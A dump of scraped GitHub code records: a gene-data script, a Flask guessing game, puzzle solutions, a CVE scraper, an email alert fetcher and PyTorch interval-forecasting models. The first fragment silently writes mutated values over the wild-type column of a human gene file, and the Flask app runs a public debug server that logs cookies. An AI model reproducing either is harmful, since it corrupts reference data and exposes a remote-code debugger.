archivo_mutante.drop('WILD', axis=1) # Drop the 'WILD' column\n\narchivo_mutante= archivo_mutante[['Gen_Name','mutante', 'PROTEIN', 'REGION3-5']] # Reorder the columns\n\narchivo_mutante.rename(columns={'mutante': 'WILD'}, inplace=True) # Rename the 'mutante' column back to 'WILD'\n\narchivo_mutante.to_csv(r\"./human_genes.csv\", index= False) # Save the new human genes data with the faults introduced\n","repo_name":"fredoinsilico/apocaliptico_workshop","sub_path":"BlackHenryNet.py","file_name":"BlackHenryNet.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8032438427","text":"import os\r\nimport re\r\nimport sys\r\nfrom base64 import b64encode\r\nfrom pprint import pprint\r\nfrom random import randint\r\nfrom time import strftime, localtime, time\r\nfrom traceback import print_exc, format_exc\r\n\r\nfrom flask import Flask, request, redirect, jsonify, logging, make_response, render_template, \\\r\n    send_file, send_from_directory, url_for, session, abort\r\nfrom werkzeug.routing import BaseConverter\r\n\r\napp = Flask(__name__)\r\n\r\nrandints = {}\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    cookie = request.cookies.get(\"user-verify-cookie\")\r\n    if cookie:\r\n        return render_template(\"index.html\")\r\n    else:\r\n        response = make_response(render_template(\"index.html\"))\r\n        cookie = b64encode(os.urandom(32)).decode(\"utf8\")\r\n        response.set_cookie(\"user-verify-cookie\", cookie, max_age=300) # max_age is a lifetime in seconds, not an absolute timestamp\r\n        randints[cookie] = randint(1,100)\r\n        print(cookie)\r\n        print(randints)\r\n        return response\r\n\r\n@app.route(\"/guess\")\r\ndef guess():\r\n    guess = request.args.get(\"guess\")\r\n    try:\r\n        guess = int(guess)\r\n        if guess < 0 or guess > 100:\r\n            return \"no range\"\r\n        elif guess < randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n            return \"little\"\r\n        elif guess == randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n            randints.pop(request.cookies.get(\"user-verify-cookie\"))\r\n            return \"ok\"\r\n        elif guess > randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n            return \"big\"\r\n
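        # int() raises ValueError for non-numeric input (and TypeError when the\r\n        # \"guess\" query parameter is missing); the bare except below maps both\r\n        # cases to the \"no type\" reply.\r\n    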
except:\r\n return \"no type\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(\r\n \"0.0.0.0\",\r\n 80,\r\n debug=True,\r\n )\r\n","repo_name":"carmen09/GuessingGameSam","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23423491381","text":"__author__ = 'sisekeom'\n\nfrom sys import argv\n\ndef improves(nF,C,X,F):\n current = X/(2+(nF*F))\n possibility = C/(2+nF*F) + X/(2+(nF+1)*F)\n# print(current)\n# print(possibility)\n return possibility < current\n\n\nif __name__==\"__main__\":\n nombre = open(argv[1],'r')\n n = int(nombre.readline())\n for i in range(n):\n line = nombre.readline().strip().split(\" \")\n nF = 0\n nFpre = -1\n C = float(line[0])\n F = float(line[1])\n X = float(line[2])\n\n while nF != nFpre:\n nFpre = nF\n if improves(nF,C,X,F):\n nF=nF+1\n result = 0\n for j in range(nF):\n result = result+(C/(2+(j*F)))\n result = result + (X/(2+(nF*F)))\n print(\"Case #{0}: {1}\".format(i+1,result))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1970.py","file_name":"1970.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30552682583","text":"# Determine the number of orbits\nfrom collections import deque\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\ndef test_data():\n return [\"COM)B\",\n \"B)C\",\n \"C)D\",\n \"D)E\",\n \"E)F\",\n \"B)G\",\n \"G)H\",\n \"D)I\",\n \"E)J\",\n \"J)K\",\n \"K)L\"]\n\nprint(\"Starting Day6\")\nvalues = read_file('input.txt')\n# values = test_data()\n\n# Iterate through list of orbits and construct the map\nnodes = {}\nroots = set()\nleafs = set()\nfor val in values:\n left, right = val.split(')')\n roots.add(left)\n leafs.add(right)\n if left not in nodes:\n nodes[left] = [right]\n else:\n nodes[left].append(right)\n\nroots = roots - leafs\nprint(\"The roots of the map are: {0!s}\".format(','.join(roots)))\n\n# Now go through the map and add up all the orbits\norbits = 0\n# queue = deque([(x, 0) for x in roots])\nqueue = deque([('COM', 0)])\nwhile queue:\n parent, depth = queue.popleft()\n if parent not in nodes:\n continue\n children = nodes[parent]\n orbits += len(children) * (depth + 1)\n for child in children:\n queue.append((child, depth + 1))\n\nprint(\"The total number of orbits is: {0!s}\".format(orbits))\n","repo_name":"theknoxinator/AoC","sub_path":"2019/Day6/day6-1.py","file_name":"day6-1.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20606587948","text":"#!/usr/bin/python3\ndef roman_to_int(s):\n if not s:\n return 0\n if type(s) != str:\n return 0\n trans = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\n s = s.replace(\"IV\", \"IIII\").replace(\"IX\", \"VIIII\")\n s = s.replace(\"XL\", \"XXXX\").replace(\"XC\", \"LXXXX\")\n s = s.replace(\"CD\", \"CCCC\").replace(\"CM\", \"DCCCC\")\n number = 0\n for char in s:\n number += trans[char]\n return 
number\n","repo_name":"MahiSoft95/volksy-tech-higher_level_programming","sub_path":"python-more_data_structures/12-roman_to_int.py","file_name":"12-roman_to_int.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2024850611","text":"def count_vowels(sentence):\n # 소문자로 변환\n sentence = sentence.lower()\n # 모음 리스트\n vowels = ['a', 'e', 'i', 'o', 'u']\n # 모음 개수 초기화\n count = 0\n # 문장을 순회하면서 모음 개수 세기\n for char in sentence:\n if char in vowels:\n count += 1\n return count\n\n\nsentences = []\nwhile True:\n sentence = input()\n if sentence == '#':\n break\n sentences.append(sentence)\n\nfor sentence in sentences:\n print(count_vowels(sentence))\n","repo_name":"yechan9601/Algorithm-ProblemSolving","sub_path":"algorithm/bronze/numOfVowel.py","file_name":"numOfVowel.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33921087267","text":"#encoding=utf-8\nimport json\nimport cvePull.pullMitreCVE\nimport microsoftPull.pullMicrosoftProductName\n\ndef save_vuln():\n cveName = cvePull.pullMitreCVE.mitre_pull_cve()\n #保存cveName、productNumber、product到本地文件\n file = open('saveVuln.txt', 'w')\n #建立list存储cveName、productNumber、product\n save = {}\n for cve in cveName:\n productNumber, productName = microsoftPull.pullMicrosoftProductName.microsoft_pull_product_name(cve)\n save['cveName'] = cve\n save['productNumber'] = int(productNumber)\n save['product'] = productName\n #print(save)\n # for i in range(0, int(productNumber)):\n # save['cveName'] = cve\n # save['productNumber'] = int(productNumber)\n # save['product' + str(i)] = productName[i]\n # print(\"i==========%s\", i)\n\n # save['cveName'] = cve\n # save['productNumber'] = int(productNumber)\n # for i in range(0, int(productNumber)):\n # save['product' + str(i)] = productName[i]\n # print(\"i==========%s\", i)\n # print(save)\n\n file.write(json.dumps(save,ensure_ascii=True) + \"\\n\")\n file.close()\n ","repo_name":"shelly-cn/ExchangeCVESearch","sub_path":"jsonStorage/saveVuln.py","file_name":"saveVuln.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2864041969","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport os, uuid, logging, math\nimport torch\nimport numpy as np\nimport matplotlib as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom joblib import Parallel, delayed\n\n# Orders vertices so they go clockwise or anti-clockwise around polygon\ndef order_vertices(vertices):\n center = vertices.mean(axis=0)\n angles = np.arctan2(vertices[:,1] - center[1], vertices[:,0] - center[0])\n idx = np.argsort(angles)\n return vertices[idx]\n\n# Calculates area of ordered vertices of polygon\ndef polygon_area(vertices):\n total_area = 0\n for idx in range(0,vertices.shape[0]-1):\n total_area += vertices[idx,0]*vertices[idx+1,1] - vertices[idx+1,0]*vertices[idx,1]\n total_area += vertices[-1,0]*vertices[0,1] - vertices[0,0]*vertices[-1,1]\n return 0.5 * abs(total_area)\n\ndef isnan(x):\n return x != x\n\ndef unique_name():\n\treturn uuid.uuid4().hex[:6]\n\ndef make_dir_if_not_exists(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\ndef logsumexp(inputs, dim=None, keepdim=False):\n \"\"\"Numerically stable logsumexp.\n\n Args:\n 
inputs: A Variable with any shape.\n dim: An integer.\n keepdim: A boolean.\n\n Returns:\n Equivalent of log(sum(exp(inputs), dim=dim, keepdim=keepdim)).\n \"\"\"\n # For a 1-D array x (any array along a single dimension),\n # log sum exp(x) = s + log sum exp(x - s)\n # with s = max(x) being a common choice.\n if dim is None:\n inputs = inputs.view(-1)\n dim = 0\n s, _ = torch.max(inputs, dim=dim, keepdim=True)\n outputs = s + (inputs - s).exp().sum(dim=dim, keepdim=True).log()\n if not keepdim:\n outputs = outputs.squeeze(dim)\n return outputs\n\ndef sum_i_neq_j(x):\n\t\"\"\"Sum over all elements except i-th for all i (used in VIMCO calculation)\n\n\tInput:\n\t\tx: Variable of size `iw_size` x `batch_size`\n\t\n\tOutput:\n\t\tresult: Of size, `iw_size` x `batch_size` (i,j)th element is equal to sum_{k neq i} x_{k,j}\n\t\"\"\"\n\tiw_size = x.size(0)\n\tbatch_size = x.size(1)\n\n\t# TODO: Would torch.expand instead of torch.repeat make this faster?\n\tinv_mask = (1. - torch.eye(iw_size)\n\t\t\t\t).unsqueeze(dim=2).repeat(1, 1, batch_size)\n\tx_masked = torch.mul(x.view(1, iw_size, batch_size), inv_mask)\n\treturn torch.sum(x_masked, dim=1)\n\ndef ln_sum_i_neq_j(x):\n\t\"\"\"Sum over all elements except i-th for all i in log-space (used in VIMCO calculation)\n\n\tInput:\n\t\tx: Variable of size `iw_size` x `batch_size`\n\t\n\tOutput:\n\t\tresult: Of size, `iw_size` x `batch_size` (i,j)th element is equal to sum_{k neq i} x_{k,j} in log-space\n\t\"\"\"\n\tiw_size = x.size(0)\n\tbatch_size = x.size(1)\n\n\t# TODO: Would torch.expand instead of torch.repeat make this faster?\n\tinv_mask = torch.eye(iw_size).unsqueeze(dim=2).repeat(1, 1, batch_size)\n\tx_masked = x.view(1, iw_size, batch_size) - inv_mask*1000000.0\n\treturn logsumexp(x_masked, dim=1)\n\ndef count_parameters(model):\n\treturn sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef numify(x):\n\treturn np.round(x.cpu().detach().numpy(), decimals=3)\n\ndef numify2(x):\n\treturn x.cpu().detach().numpy()\n\ndef stats(v):\n print('min', torch.min(v).cpu().detach().numpy(), 'max', torch.max(v).cpu().detach().numpy(), 'mean', torch.mean(v).cpu().detach().numpy(), 'NaNs', torch.sum(isnan(v)).cpu().detach().numpy(), '-Inf', torch.sum(v==float(\"-Inf\")).cpu().detach().numpy(), '+Inf', torch.sum(v==float(\"Inf\")).cpu().detach().numpy() )\n\ndef model_pfd(cell_symb, sample_count, v):\n # update pfd\n pfd = 0\n for key in cell_symb:\n op_cell = cell_symb[key][2] / (sample_count + v)\n lg_p = cell_symb[key][1]\n pfd += op_cell * (10 ** (lg_p))\n # add pfd of empty cell\n pfd += v/(sample_count + v) * 1.0\n print('probability of failure:', pfd)\n return pfd\n\ndef model_avg_fail(cell_symb):\n # update avg acc\n avg_acc = 0\n for key in cell_symb:\n lg_p = cell_symb[key][1]\n avg_acc += 10 ** (lg_p)\n avg_acc = avg_acc / len(cell_symb)\n print('average failure:', avg_acc)\n return avg_acc\n\n\nclass record:\n\n def __init__(self, filename, startTime):\n\n self.startTime = startTime\n\n directory = os.path.dirname(filename)\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n self.file = open(filename, \"w+\")\n\n def write(self, text):\n self.file.write(text)\n\n def close(self):\n self.file.close()\n\n def resetTime(self):\n self.write(\"reset time at %s\\n\\n\" % (time.time() - self.startTime))\n self.startTime = time.time()\n\n\ndef writeInfo(r, idx, pfd, avg_accuracy, mle_fail):\n r.write(\"time:%s\\n\" % (time.time() - r.startTime))\n r.write('--------------------------\\n')\n r.write(\"No. 
of Samples:%d\\n\" % (idx))\n r.write(\"probability of failure: %.5f\\n\" % (pfd))\n r.write(\"average failure: %.5f\\n\" % (avg_accuracy))\n r.write(\"MLE failure estimation: %.5f\\n\" % (mle_fail))\n r.write('--------------------------\\n')\n r.write('--------------------------\\n')\n\ndef get_nearest_oppo_dist(X, y, norm, n_jobs=10):\n if len(X.shape) > 2:\n X = X.reshape(len(X), -1)\n p = norm\n\n def helper(yi):\n return NearestNeighbors(n_neighbors=1,\n metric='minkowski', p=p, n_jobs=12).fit(X[y != yi])\n\n nns = Parallel(n_jobs=n_jobs)(delayed(helper)(yi) for yi in np.unique(y))\n ret = np.zeros(len(X))\n for yi in np.unique(y):\n dist, _ = nns[yi].kneighbors(X[y == yi], n_neighbors=1)\n ret[np.where(y == yi)[0]] = dist[:, 0]\n\n return nns, ret\n\ndef plot_label_clusters(latent_data, labels):\n # display a 2D plot of the digit classes in the latent space\n plt.figure(figsize=(12, 10))\n plt.scatter(latent_data[:, 0], latent_data[:, 1], c=labels)\n plt.colorbar()\n plt.xlabel(\"z[0]\")\n plt.ylabel(\"z[1]\")\n plt.show()\n\ndef load_checkpoint(model, model_dir):\n path = os.path.join(model_dir, model.name)\n\n # load the checkpoint.\n checkpoint = torch.load(path)\n print('=> loaded checkpoint of {name} from {path}'.format(\n name=model.name, path=(path)\n ))\n\n # load parameters and return the checkpoint's epoch and precision.\n model.load_state_dict(checkpoint['state'])\n epoch = checkpoint['epoch']\n return epoch","repo_name":"havelhuang/ReAsDL","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"23037371471","text":"#%%\n# Imports\nimport os\nimport json\nimport logging\nimport csv\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\nroot_logger= logging.getLogger()\nroot_logger.setLevel(logging.DEBUG) \nhandler = logging.FileHandler('logs.log', 'w', 'utf-8') \nhandler.setFormatter(logging.Formatter('%(asctime)s %(message)s')) \nroot_logger.addHandler(handler)\n#%%\nlogging.info(\"Mise à jour de la base d'alertes à partir de la boite mail {} \".format(os.environ.get(\"MAIL_USERNAME\")))\nfrom bs4 import BeautifulSoup\nimport json\n\ndef parse_alert(html):\n results = []\n parser = BeautifulSoup(html, features=\"html.parser\")\n data_json = json.loads(parser.find_all('script')[0].getText())\n widgets = data_json[\"cards\"][0][\"widgets\"]\n for widget in widgets:\n results.append((widget[\"title\"], widget[\"description\"], \"https\" + widget[\"url\"].split(\"https\")[2]))\n return results\n\nfrom imap_tools import MailBox, AND\nalerts = []\nwith MailBox(os.environ.get(\"IMAP_HOST\")).login(os.environ.get(\"MAIL_USERNAME\"),os.environ.get(\"MAIL_PASSWORD\")) as mailbox:\n for msg in mailbox.fetch(): # generator: imap_tools.MailMessage\n\n print(msg.subject)\n if(\"Alerte Google\" in msg.subject):\n alerte = {\n 'mail_id' : msg.uid,\n 'date' : msg.date,\n 'candidat' : msg.subject.split(':')[1].strip(),\n 'content_html' : msg.html,\n 'content_raw' : msg.text,\n 'content_parsed' : parse_alert(msg.html)\n }\n alerts.append(alerte)\n \n\nwith open(\"data/alertes.csv\",\"w+\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"mail_id\",\"date\",\"candidat\",\"content_html\",\"content_raw\",\"content_parsed\"])\n writer.writeheader()\n [writer.writerow(row) for row in alerts]\n\nlogging.info(\"{} alertes exportées vers 
data/alertes.csv\".format(len(alerts)))\n","repo_name":"datapolitics-x-mazancourt-conseil/alerts-listener","sub_path":"fetch_alerts.py","file_name":"fetch_alerts.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36666003549","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport math\nimport snntorch as snn\nfrom snntorch import spikegen\nfrom snntorch import surrogate \n\n# TO DO: The recent multi-step implementation is based on Dense layer decoding. Should try some other methods such as seq2seq.\nclass winkler_objective(nn.Module):\n \"Constrainted Winkler loss function\"\n def __init__(self, lambda_ = 0.001, alpha_ = 0.05, soften_=160., device='cpu', batch_size=128):\n super(winkler_objective, self).__init__()\n self.lambda_ = lambda_\n self.alpha_ = alpha_\n self.soften_ = soften_\n self.device = device\n self.batch_size = batch_size\n \n def forward(self, y_pred, y_true):\n y_true = y_true\n # odd index element is the upperbound at time t, while even index element is the lowerbound at time t. \n y_u = y_pred[:,::2]\n y_l = y_pred[:,1::2]\n\n K_SU = torch.sigmoid(self.soften_ * (y_u - y_true))\n K_SL = torch.sigmoid(self.soften_ * (y_true - y_l))\n K_S = torch.multiply(K_SU, K_SL)\n \n PICP_S = torch.mean(K_S)\n MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square((1-self.alpha_) - PICP_S)\n\n S_t = torch.abs(y_u-y_l) + (2/self.alpha_)*(torch.multiply(y_l-y_true, torch.sigmoid(self.soften_ * (y_l - y_true)))) + (2/self.alpha_)*(torch.multiply(y_true-y_u, torch.sigmoid(self.soften_ * (y_true - y_u))))\n S_overline = torch.mean(S_t)\n\n Loss = S_overline + self.lambda_ * MLE_PICP \n\n return Loss\n\n\n\nclass qd_objective(nn.Module):\n '''Loss_QD'''\n def __init__(self, lambda_ = 0.001, alpha_ = 0.05, soften_=160., device='cpu', batch_size=128):\n super(qd_objective, self).__init__()\n self.lambda_ = lambda_\n self.alpha_ = alpha_\n self.soften_ = soften_\n self.epsilon = torch.finfo(torch.float).eps\n self.device = device\n self.batch_size = batch_size\n \n def forward(self, y_pred, y_true):\n y_true = y_true\n y_u = y_pred[:,::2]\n y_l = y_pred[:,1::2]\n\n K_HU = torch.maximum(torch.zeros(1).to(self.device),torch.sign(y_u - y_true))\n K_HL = torch.maximum(torch.zeros(1).to(self.device),torch.sign(y_true - y_l))\n K_H = torch.multiply(K_HU, K_HL)\n\n K_SU = torch.sigmoid(self.soften_ * (y_u - y_true))\n K_SL = torch.sigmoid(self.soften_ * (y_true - y_l))\n K_S = torch.multiply(K_SU, K_SL)\n \n PICP_S = torch.mean(K_S)\n\n MPIW_c = torch.sum(torch.multiply((y_u - y_l),K_H))/(torch.sum(K_H)+self.epsilon)\n # The higher PICP the better\n MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square(torch.maximum(torch.zeros(1).to(self.device),(1-self.alpha_) - PICP_S))\n # The closer to nominal confidence the better\n # MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square((1-self.alpha_) - PICP_S)\n \n Loss_S = MPIW_c + self.lambda_ * MLE_PICP\n \n return Loss_S\n\nclass MLP(nn.Module):\n\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1):\n super(MLP, self).__init__()\n self.input_window_size = 
input_window_size\n        self.predicted_step = predicted_step\n        # an affine operation: y = Wx + b\n        self.num_neurons = num_neurons\n        self.fc1 = nn.Linear(self.input_window_size, self.num_neurons)\n        self.bn1 = nn.BatchNorm1d(self.num_neurons)\n        self.fc2 = nn.Linear(self.num_neurons, self.num_neurons)\n        self.bn2= nn.BatchNorm1d(self.num_neurons)\n        self.fc3 = nn.Linear(self.num_neurons, self.num_neurons)\n        self.bn3= nn.BatchNorm1d(self.num_neurons)\n        self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n        # one (upper, lower) bias pair per predicted step, as in the recurrent models below\n        output_bias = torch.tensor([0.2,-0.2])\n        for i in range(self.predicted_step-1):\n            output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n        self.output.bias = torch.nn.Parameter(output_bias)\n\n    def forward(self, x):\n        x = self.fc1(x)\n        x = F.relu(self.bn1(x))\n        x = self.fc2(x)\n        x = F.relu(self.bn2(x))\n        x = self.fc3(x)\n        x = F.relu(self.bn3(x))\n        x = self.output(x)\n        return x\n\n# https://arxiv.org/pdf/1512.05287.pdf\n# To adapt from NLP task to univariable time series forecasting task, the embedding dropout is removed and the NN architecture is adapted to keep simplicity.\nclass VariationalDropout(nn.Module):\n    \"\"\"\n    Variational Dropout module. In comparison to the default PyTorch module, this one only changes the dropout mask when\n    sample() is called.\n    \"\"\"\n\n    def __init__(self, dropout, input_dim, device):\n        super().__init__()\n        self.dropout = dropout\n        self.input_dim = input_dim\n        self.device = device\n        self.mask = None\n\n    def forward(self, x):\n        if self.mask is None:\n            raise ValueError(\"Dropout mask hasn't been sampled yet. Use .sample().\")\n\n        return (x * self.mask)\n\n    def sample(self, batch_size: int):\n        \"\"\"\n        Sample a new dropout mask for a batch of specified size.\n        Parameters\n        ----------\n        batch_size: int\n            Size of current batch.\n        \"\"\"\n        self.mask = (torch.bernoulli(\n            torch.ones(batch_size, self.input_dim, device=self.device)\n            * (1 - self.dropout)\n        ) / (1 - self.dropout))\n\nclass VariationalLSTM(nn.Module):\n\n    def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_dropout = 0.2, time_dropout = 0.2, batch_size=128, device = 'cpu'):\n        super(VariationalLSTM, self).__init__()\n        self.input_window_size = input_window_size\n        self.predicted_step = predicted_step\n        self.num_neurons = num_neurons\n        self.device = device\n        self.layer_dropout = layer_dropout\n        self.time_dropout = time_dropout\n        self.batch_size = batch_size\n        self.lstm1 = nn.LSTMCell(1, self.num_neurons)\n        self.lstm2 = nn.LSTMCell(self.num_neurons, self.num_neurons)\n        self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n        # one (upper, lower) bias pair per predicted step\n        output_bias = torch.tensor([0.2,-0.2])\n        for i in range(self.predicted_step-1):\n            output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n        self.output.bias = torch.nn.Parameter(output_bias)\n        # dropout modules\n        num_layers = 2\n        self.dropout_modules = {\n            \"layer\": [VariationalDropout(layer_dropout, num_neurons, device) for _ in range(num_layers)],\n            \"time\": [VariationalDropout(time_dropout, num_neurons, device) for _ in range(num_layers)],\n        }\n\n    def forward(self, x):\n        # batch_size x hidden_size\n        hidden_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n        cell_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n        hidden_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n        cell_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n        \n        # weights initialization\n        torch.nn.init.xavier_normal_(hidden_state_1)\n        torch.nn.init.xavier_normal_(cell_state_1)\n        torch.nn.init.xavier_normal_(hidden_state_2)\n        torch.nn.init.xavier_normal_(cell_state_2)\n\n        # sample dropout masks\n        self.sample_masks(self.batch_size)\n        \n        # unfolding LSTM\n        for i in range(self.input_window_size):\n            hidden_state_1, cell_state_1 = self.lstm1(x[:, 
i], (self.dropout_modules[\"time\"][0](hidden_state_1), cell_state_1))\n hidden_state_1 = self.dropout_modules[\"layer\"][0](hidden_state_1)\n hidden_state_2, cell_state_2 = self.lstm2(hidden_state_1, (self.dropout_modules[\"time\"][1](hidden_state_2), cell_state_2))\n hidden_state_2 = self.dropout_modules[\"layer\"][1](hidden_state_2)\n output = self.output(hidden_state_2)\n return output\n \n def sample_masks(self, batch_size):\n \"\"\"\n Sample masks for the current batch.\n Parameters\n ----------\n batch_size: int\n Size of the current batch.\n \"\"\"\n # Iterate over type of dropout modules (\"layer\", \"time\")\n for dropout_modules in self.dropout_modules.values():\n # Iterate over all dropout modules of one type (across different layers)\n for layer_module in dropout_modules:\n layer_module.sample(batch_size)\n\nclass LSTM(nn.Module):\n\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, device = 'cpu'):\n super(LSTM, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.lstm1 = nn.LSTMCell(1, self.num_neurons)\n self.lstm2 = nn.LSTMCell(self.num_neurons, self.num_neurons)\n self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n output_bias = torch.tensor([0.2,-0.2])\n for i in range(self.predicted_step-1):\n output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n self.output.bias = torch.nn.Parameter(output_bias)\n\n def forward(self, x): \n # batch_size x hidden_size\n hidden_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n hidden_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n \n # weights initialization\n torch.nn.init.xavier_normal_(hidden_state_1)\n torch.nn.init.xavier_normal_(cell_state_1)\n torch.nn.init.xavier_normal_(hidden_state_2)\n torch.nn.init.xavier_normal_(cell_state_2)\n \n # unfolding LSTM\n for i in range(self.input_window_size):\n hidden_state_1, cell_state_1 = self.lstm1(x[:, i], (hidden_state_1, cell_state_1))\n hidden_state_2, cell_state_2 = self.lstm2(hidden_state_1, (hidden_state_2, cell_state_2))\n output = self.output(hidden_state_2)\n return output\n\nclass GRU(nn.Module):\n # Note the GRU used in the paper is Bidirectional GRU\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_num = 2, bidirectional = True, device = 'cpu'):\n super(GRU, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.layer_num = layer_num\n self.D = 1\n if bidirectional:\n self.D = 2\n self.gru = nn.GRU(1, self.num_neurons, self.layer_num, batch_first=True, bidirectional = bidirectional)\n self.output = nn.Linear(self.D*self.num_neurons, 2*self.predicted_step)\n # When meet init issue in qd objective, can uncomment the following code \n output_bias = torch.tensor([0.2,-0.2])\n for i in range(self.predicted_step-1):\n output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n self.output.bias = torch.nn.Parameter(output_bias)\n\n def forward(self, x): \n # Initializing hidden state for first input with zeros\n hidden_state0 = torch.zeros(self.D*self.layer_num, x.size(0), self.num_neurons).to(self.device)\n output, _ = self.gru(x, hidden_state0)\n output = 
self.output(output[:,-1,:])\n        return output\n\nclass SNN(nn.Module):\n\n    def __init__(self, num_neurons = 64, threshold = 0.5, input_window_size = 24, predicted_step = 1):\n        super(SNN, self).__init__()\n        self.input_window_size = input_window_size\n        self.predicted_step = predicted_step\n        self.num_neurons = num_neurons\n        self.threshold = threshold\n        self.slstm1 = snn.SLSTM(1, self.num_neurons, threshold=self.threshold, spike_grad=surrogate.fast_sigmoid(), learn_threshold=True)\n        self.slstm2 = snn.SLSTM(self.num_neurons, self.num_neurons, threshold=self.threshold, spike_grad=surrogate.fast_sigmoid(), learn_threshold=True)\n        self.output = nn.Linear((self.input_window_size+2)*self.num_neurons, 2*self.predicted_step)\n        output_bias = torch.tensor([0.2,-0.2])\n        for i in range(self.predicted_step-1):\n            output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n        self.output.bias = torch.nn.Parameter(output_bias)\n\n    def forward(self, x):\n        # Initialize hidden states and outputs at t=0\n        syn1, mem1 = self.slstm1.init_slstm()\n        syn2, mem2 = self.slstm2.init_slstm()\n        \n        lst = None\n        \n        for step in range(self.input_window_size):\n            spk1, syn1, mem1 = self.slstm1(x[:, step, :], syn1, mem1)\n            spk2, syn2, mem2 = self.slstm2(spk1, syn2, mem2)\n            \n            if lst == None:\n                lst = spk2\n            else:\n                lst = torch.cat((lst, spk2), dim=1)\n        \n        spk2, syn2, mem2 = self.slstm2(mem1, syn2, mem2)\n        lst = torch.cat((lst, spk2), dim=1)\n        lst = torch.cat((lst, mem2), dim=1)\n        \n        otp = self.output(lst)\n        return otp\n\nclass gaussian_log_likelihood(nn.Module):\n    '''Compute the Gaussian log-likelihood, which needs to be maximized.\n    The loss function proposed in https://arxiv.org/abs/1704.04110 .\n    '''\n    def __init__(self):\n        super(gaussian_log_likelihood, self).__init__()\n    \n    \n    def forward(self, mu, sigma, labels):\n        zero_index = (labels != 0)\n        distribution = torch.distributions.normal.Normal(mu[zero_index], sigma[zero_index])\n        likelihood = distribution.log_prob(labels[zero_index])\n        return -torch.mean(likelihood)\n    \n\nclass DeepAR(nn.Module):\n    # This model only makes partial use of the DeepAR model (https://arxiv.org/abs/1704.04110) to provide a parametric probabilistic forecasting method based on a Gaussian assumption.
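 Only the Gaussian (mu, sigma) output head and the log-likelihood objective above are reused; the autoregressive sampling procedure of the original paper is not implemented here.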
